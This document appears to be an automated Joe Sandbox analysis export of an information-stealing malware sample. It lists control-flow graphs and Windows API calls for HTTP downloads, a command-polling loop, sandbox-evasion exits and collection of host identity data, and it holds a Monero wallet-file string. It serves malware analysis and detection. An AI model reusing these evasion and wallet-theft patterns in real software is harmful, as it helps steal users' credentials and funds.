                                control_flow_graph 1033 b76280-b7630b call b8a7a0 call b747b0 call b8a740 InternetOpenA StrCmpCA 1040 b76314-b76318 1033->1040 1041 b7630d 1033->1041 1042 b7631e-b76342 InternetConnectA 1040->1042 1043 b76509-b76525 call b8a7a0 call b8a800 * 2 1040->1043 1041->1040 1045 b764ff-b76503 InternetCloseHandle 1042->1045 1046 b76348-b7634c 1042->1046 1062 b76528-b7652d 1043->1062 1045->1043 1048 b7634e-b76358 1046->1048 1049 b7635a 1046->1049 1051 b76364-b76392 HttpOpenRequestA 1048->1051 1049->1051 1053 b764f5-b764f9 InternetCloseHandle 1051->1053 1054 b76398-b7639c 1051->1054 1053->1045 1056 b763c5-b76405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 b7639e-b763bf InternetSetOptionA 1054->1057 1059 b76407-b76427 call b8a740 call b8a800 * 2 1056->1059 1060 b7642c-b7644b call b88940 1056->1060 1057->1056 1059->1062 1067 b7644d-b76454 1060->1067 1068 b764c9-b764e9 call b8a740 call b8a800 * 2 1060->1068 1071 b764c7-b764ef InternetCloseHandle 1067->1071 1072 b76456-b76480 InternetReadFile 1067->1072 1068->1062 1071->1053 1076 b76482-b76489 1072->1076 1077 b7648b 1072->1077 1076->1077 1080 b7648d-b764c5 call b8a9b0 call b8a8a0 call b8a800 1076->1080 1077->1071 1080->1072
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B763FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B7646D
                                • InternetCloseHandle.WININET(00000000), ref: 00B764EF
                                • InternetCloseHandle.WININET(00000000), ref: 00B764F9
                                • InternetCloseHandle.WININET(00000000), ref: 00B76503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: f44786b8634a3a805eafa892ff8737fd38991fd47d1601e5515a19f845274a36
                                • Instruction ID: fa4a2ca19d5fd3038758ee11dbf1d298013b5fdbca7dfa28c92a4399ccd3013b
                                • Opcode Fuzzy Hash: f44786b8634a3a805eafa892ff8737fd38991fd47d1601e5515a19f845274a36
                                • Instruction Fuzzy Hash: 00711E75A00218EBEB14EBA4DC45BEE77B8FB44700F108199F509AB290DBB46E85CF51

                                Control-flow Graph

                                control_flow_graph 1090 b85510-b85577 call b85ad0 call b8a820 * 3 call b8a740 * 4 1106 b8557c-b85583 1090->1106 1107 b85585-b855b6 call b8a820 call b8a7a0 call b71590 call b851f0 1106->1107 1108 b855d7-b8564c call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1106->1108 1124 b855bb-b855d2 call b8a8a0 call b8a800 1107->1124 1134 b85693-b856a9 call b8aad0 StrCmpCA 1108->1134 1138 b8564e-b8568e call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1108->1138 1124->1134 1139 b857dc-b85844 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1134->1139 1140 b856af-b856b6 1134->1140 1138->1134 1270 b85ac3-b85ac6 1139->1270 1143 b857da-b8585f call b8aad0 StrCmpCA 1140->1143 1144 b856bc-b856c3 1140->1144 1163 b85991-b859f9 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1143->1163 1164 b85865-b8586c 1143->1164 1149 b8571e-b85793 call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1144->1149 1150 b856c5-b85719 call b8a820 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1144->1150 1149->1143 1250 b85795-b857d5 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1149->1250 1150->1143 1163->1270 1171 b8598f-b85a14 call b8aad0 StrCmpCA 1164->1171 1172 b85872-b85879 1164->1172 1201 b85a28-b85a91 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1171->1201 1202 b85a16-b85a21 Sleep 1171->1202 1179 b8587b-b858ce call b8a820 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1172->1179 1180 b858d3-b85948 call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 b8594a-b8598a call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1180->1275 1201->1270 1202->1106 1250->1143 1275->1171
                                APIs
                                  • Part of subcall function 00B8A820: lstrlen.KERNEL32(00B74F05,?,?,00B74F05,00B90DDE), ref: 00B8A82B
                                  • Part of subcall function 00B8A820: lstrcpy.KERNEL32(00B90DDE,00000000), ref: 00B8A885
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B856A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85857
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85228
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85318
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B8532F
                                  • Part of subcall function 00B852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B85364
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B85383
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B853AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B8578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00B85A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: d8c0c2dbc48314842802607c70c19f911e2630f46790f73a05fe9d43a8f06daf
                                • Instruction ID: 0d0e51fd5d19bee07798278db43698cc9dd2561d5d395712f497a57ab45d137c
                                • Opcode Fuzzy Hash: d8c0c2dbc48314842802607c70c19f911e2630f46790f73a05fe9d43a8f06daf
                                • Instruction Fuzzy Hash: FBE11275910204DADB18FBA4DC969ED73B8AF54300F5085A9B506A61B1EF386F09CBB2

                                Control-flow Graph

                                control_flow_graph 1301 b817a0-b817cd call b8aad0 StrCmpCA 1304 b817cf-b817d1 ExitProcess 1301->1304 1305 b817d7-b817f1 call b8aad0 1301->1305 1309 b817f4-b817f8 1305->1309 1310 b817fe-b81811 1309->1310 1311 b819c2-b819cd call b8a800 1309->1311 1313 b8199e-b819bd 1310->1313 1314 b81817-b8181a 1310->1314 1313->1309 1316 b8185d-b8186e StrCmpCA 1314->1316 1317 b8187f-b81890 StrCmpCA 1314->1317 1318 b81970-b81981 StrCmpCA 1314->1318 1319 b818f1-b81902 StrCmpCA 1314->1319 1320 b81951-b81962 StrCmpCA 1314->1320 1321 b81932-b81943 StrCmpCA 1314->1321 1322 b81913-b81924 StrCmpCA 1314->1322 1323 b81835-b81844 call b8a820 1314->1323 1324 b81849-b81858 call b8a820 1314->1324 1325 b818ad-b818be StrCmpCA 1314->1325 1326 b818cf-b818e0 StrCmpCA 1314->1326 1327 b8198f-b81999 call b8a820 1314->1327 1328 b81821-b81830 call b8a820 1314->1328 1330 b8187a 1316->1330 1331 b81870-b81873 1316->1331 1332 b8189e-b818a1 1317->1332 1333 b81892-b8189c 1317->1333 1347 b8198d 1318->1347 1348 b81983-b81986 1318->1348 1338 b8190e 1319->1338 1339 b81904-b81907 1319->1339 1344 b8196e 1320->1344 1345 b81964-b81967 1320->1345 1342 b8194f 1321->1342 1343 b81945-b81948 1321->1343 1340 b81930 1322->1340 1341 b81926-b81929 1322->1341 1323->1313 1324->1313 1334 b818ca 1325->1334 1335 b818c0-b818c3 1325->1335 1336 b818ec 1326->1336 1337 b818e2-b818e5 1326->1337 1327->1313 1328->1313 1330->1313 1331->1330 1352 b818a8 1332->1352 1333->1352 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1352->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00B817C5
                                • ExitProcess.KERNEL32 ref: 00B817D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 878d194eec5d19c281550136fa30255900a69de4e8c6ea94e0c927618116849e
                                • Instruction ID: b0cfd0af3123a7e1c80c6ca40045db28803a7b7e1c3da9f76d9d53b2fae62963
                                • Opcode Fuzzy Hash: 878d194eec5d19c281550136fa30255900a69de4e8c6ea94e0c927618116849e
                                • Instruction Fuzzy Hash: 46515CB4A11209EFDB04EFA8D994ABE77F9BF44304F104499E806A7360D770E952CB62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 b87500-b8754a GetWindowsDirectoryA 1357 b8754c 1356->1357 1358 b87553-b875c7 GetVolumeInformationA call b88d00 * 3 1356->1358 1357->1358 1365 b875d8-b875df 1358->1365 1366 b875fc-b87617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 b875e1-b875fa call b88d00 1365->1367 1369 b87628-b87658 wsprintfA call b8a740 1366->1369 1370 b87619-b87626 call b8a740 1366->1370 1367->1365 1377 b8767e-b8768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B87542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B8757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B8760A
                                • wsprintfA.USER32 ref: 00B87640
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: a799bbc932a83722768f665f9870b031f8b3598b1030c3d144eae0183f8f3dc9
                                • Instruction ID: 2badba9054af26c58c4c6a5b57660e45a8d956f945407b84bfc0842852c6f1d6
                                • Opcode Fuzzy Hash: a799bbc932a83722768f665f9870b031f8b3598b1030c3d144eae0183f8f3dc9
                                • Instruction Fuzzy Hash: 2B4183B1D44348EBDB10EF98DC85BDEBBB8EF18704F100199F509A7290DB74AA44CBA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306D8), ref: 00B898A1
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306A8), ref: 00B898BA
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306C0), ref: 00B898D2
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306F0), ref: 00B898EA
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009307B0), ref: 00B89903
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00938890), ref: 00B8991B
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00926600), ref: 00B89933
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009264C0), ref: 00B8994C
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930558), ref: 00B89964
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930708), ref: 00B8997C
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930840), ref: 00B89995
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930720), ref: 00B899AD
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009262E0), ref: 00B899C5
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930768), ref: 00B899DE
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B711D0: ExitProcess.KERNEL32 ref: 00B71211
                                  • Part of subcall function 00B71160: GetSystemInfo.KERNEL32(?), ref: 00B7116A
                                  • Part of subcall function 00B71160: ExitProcess.KERNEL32 ref: 00B7117E
                                  • Part of subcall function 00B71110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B7112B
                                  • Part of subcall function 00B71110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B71132
                                  • Part of subcall function 00B71110: ExitProcess.KERNEL32 ref: 00B71143
                                  • Part of subcall function 00B71220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B7123E
                                  • Part of subcall function 00B71220: __aulldiv.LIBCMT ref: 00B71258
                                  • Part of subcall function 00B71220: __aulldiv.LIBCMT ref: 00B71266
                                  • Part of subcall function 00B71220: ExitProcess.KERNEL32 ref: 00B71294
                                  • Part of subcall function 00B86770: GetUserDefaultLangID.KERNEL32 ref: 00B86774
                                  • Part of subcall function 00B71190: ExitProcess.KERNEL32 ref: 00B711C6
                                  • Part of subcall function 00B87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                  • Part of subcall function 00B87850: RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                  • Part of subcall function 00B87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                  • Part of subcall function 00B878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                  • Part of subcall function 00B878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                  • Part of subcall function 00B878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B86AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00B86AF9
                                • Sleep.KERNEL32(00001770), ref: 00B86B04
                                • CloseHandle.KERNEL32(?,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86B1A
                                • ExitProcess.KERNEL32 ref: 00B86B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: a78f98fd82dc01352f0771400092bcfeb16bccf0bf99f4a8bbb0c8464c860f8b
                                • Instruction ID: e0e2a80e02bdc9a69c2a32f13a7385e158ebf9c6661ebbefaca1a65ca614d0ed
                                • Opcode Fuzzy Hash: a78f98fd82dc01352f0771400092bcfeb16bccf0bf99f4a8bbb0c8464c860f8b
                                • Instruction Fuzzy Hash: CC310B71904219AAEB04FBF4DC56BEE77F8AF04340F5045A9F212B61A2DF746A05C7B2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 b71220-b71247 call b889b0 GlobalMemoryStatusEx 1439 b71273-b7127a 1436->1439 1440 b71249-b71271 call b8da00 * 2 1436->1440 1442 b71281-b71285 1439->1442 1440->1442 1444 b71287 1442->1444 1445 b7129a-b7129d 1442->1445 1447 b71292-b71294 ExitProcess 1444->1447 1448 b71289-b71290 1444->1448 1448->1445 1448->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B7123E
                                • __aulldiv.LIBCMT ref: 00B71258
                                • __aulldiv.LIBCMT ref: 00B71266
                                • ExitProcess.KERNEL32 ref: 00B71294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: d9d7a19ccbee129aea6b880ec43d06483a16acc566f1d9ae1def86a96b02ccec
                                • Instruction ID: 66706002c5ca8c24ec4fd36284e28e6f94d1df466db6107a7c5755b19762e500
                                • Opcode Fuzzy Hash: d9d7a19ccbee129aea6b880ec43d06483a16acc566f1d9ae1def86a96b02ccec
                                • Instruction Fuzzy Hash: D2014FB0D44308FADB10EFD8CC49B9DB7B8AB04701F208589E709B62D1D67455418BA9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 b86af3 1451 b86b0a 1450->1451 1453 b86aba-b86ad7 call b8aad0 OpenEventA 1451->1453 1454 b86b0c-b86b22 call b86920 call b85b10 CloseHandle ExitProcess 1451->1454 1460 b86ad9-b86af1 call b8aad0 CreateEventA 1453->1460 1461 b86af5-b86b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B86AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00B86AF9
                                • Sleep.KERNEL32(00001770), ref: 00B86B04
                                • CloseHandle.KERNEL32(?,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86B1A
                                • ExitProcess.KERNEL32 ref: 00B86B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
